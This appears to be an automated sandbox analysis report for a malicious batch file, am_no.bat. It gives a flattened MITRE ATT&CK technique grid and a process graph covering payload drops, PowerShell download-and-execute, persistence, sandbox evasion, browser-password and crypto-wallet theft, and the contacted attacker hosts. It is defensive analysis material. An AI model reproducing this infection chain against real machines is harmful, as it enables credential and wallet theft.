Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | 11 Scheduled Task/Job | 11 Masquerading | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | 11 Registry Run Keys / Startup Folder | 2 Valid Accounts | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Modify Registry | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 581 Virtualization/Sandbox Evasion | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 21 Access Token Manipulation | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
Business Relationships | Server | Trusted Relationship | Visual Basic | Container Orchestration Job | Container Orchestration Job | 512 Process Injection | Web Portal Capture | Local Groups | Component Object Model and Distributed COM | Local Email Collection | Internal Proxy | Commonly Used Port | Direct Network Flood
Identify Business Tempo | Botnet | Hardware Additions | Python | Hypervisor | Process Injection | 1 Mshta | Credential API Hooking | Domain Groups | Exploitation of Remote Services | Remote Email Collection | External Proxy | Transfer Data to Cloud Account | Reflection Amplification
Behavior Graph ID: 1632121; Sample: am_no.bat; Start date: 07/03/2025; Architecture: WINDOWS; Score: 100

The graph is rendered below as a node list (node numbers in parentheses; numeric badges after a process name are kept as extracted):

Start (node 2)
• DNS/IP: defaulemot.run; youtube.com; 34 other IPs or domains
• Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 22 other signatures
• Started: rapes.exe (10); cmd.exe 3 (15); 19be97887a.exe (17); 5 other processes (19)

rapes.exe (node 10)
• DNS/IP: 176.113.115.6, ports 49690, 49691, 49693, SELECTELRU, Russian Federation
• Dropped: C:\Users\user\AppData\...\60eb3ded99.exe (PE32); C:\Users\user\AppData\...\6f3323f1e6.exe (PE32); C:\Users\user\AppData\...\ab5415a7b5.exe (PE32); 11 other malicious files
• Signatures: Contains functionality to start a terminal service; Creates multiple autostart registry keys; Hides threads from debuggers; Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
• Started: 19be97887a.exe (21); ab5415a7b5.exe (26); 2qv26zF.exe (28); 3 other processes (38)

cmd.exe (node 15)
• Dropped: C:\Temp\mtzRdqIHD.hta (HTML)
• Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Creates HTA files
• Started: mshta.exe 1 (30); 6 other processes (40)

19be97887a.exe (node 17)
• Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
• Started: chrome.exe (32)

5 other processes (node 19)
• DNS/IP: 127.0.0.1
• Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell); Tries to detect sandboxes / dynamic malware analysis system (registry check)
• Started: powershell.exe (34); firefox.exe (36)

19be97887a.exe (node 21)
• DNS/IP: defaulemot.run 104.21.32.1, ports 443, 49695, 49698, CLOUDFLARENETUS, United States
• Dropped: C:\Users\user\...\D51OAO8D0TVNMCQXHC.exe (PE32)
• Signatures: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Attempt to bypass Chrome Application-Bound Encryption; 8 other signatures

ab5415a7b5.exe (node 26)
• Signatures: Modifies windows update settings; 4 other signatures

2qv26zF.exe (node 28)
• Signatures: 6 other signatures
• Started: spoolsv.exe (42)

mshta.exe (node 30)
• Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
• Started: powershell.exe 14 17 (45)

chrome.exe (node 32)
• DNS/IP: 192.168.2.8, ports 443, 49673, 49681
• Started: chrome.exe (49)

powershell.exe (node 34)
• Started: 483d2fa8a0d53818306efeb32d3.exe (51); 2 other processes (57)

firefox.exe (node 36)
• Started: firefox.exe (53)

3 other processes (node 38)
• Dropped: C:\Users\user\AppData\Local\...\fJeYDlA9n.hta (HTML)
• Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (window names); Found API chain indicative of sandbox detection; Creates HTA files
• Started: 8 other processes (59)

6 other processes (node 40)
• Started: powershell.exe 15 (55); 2 other processes (61)

spoolsv.exe (node 42)
• Signatures: Modifies the context of a thread in another process (thread injection)

powershell.exe (node 45)
• DNS/IP: 176.113.115.7, ports 49682, 49692, 49694, SELECTELRU, Russian Federation
• Dropped: C:\Users\...\483d2fa8a0d53818306efeb32d3.exe (PE32)
• Signatures: Found many strings related to Crypto-Wallets (likely being stolen)
• Started: 483d2fa8a0d53818306efeb32d3.exe 4 (63); conhost.exe (67)

chrome.exe (node 49)
• DNS/IP: www.google.com 142.250.185.68, ports 443, 49713, 49714, GOOGLEUS, United States; play.google.com 172.217.16.206, GOOGLEUS, United States; 2 other IPs or domains

483d2fa8a0d53818306efeb32d3.exe (node 51)
• Signatures: Contains functionality to start a terminal service; Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

powershell.exe (node 55)
• Signatures: Powershell drops PE file

8 other processes (node 59)
• Started: conhost.exe (69); conhost.exe (71); conhost.exe (73); 4 other processes (75)

483d2fa8a0d53818306efeb32d3.exe (node 63)
• Dropped: C:\Users\user\AppData\Local\...\rapes.exe (PE32)
• Signatures: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Contains functionality to start a terminal service; 5 other signatures
• Started: rapes.exe (77)

rapes.exe (node 77)
• Signatures: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Contains functionality to start a terminal service; 4 other signatures

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.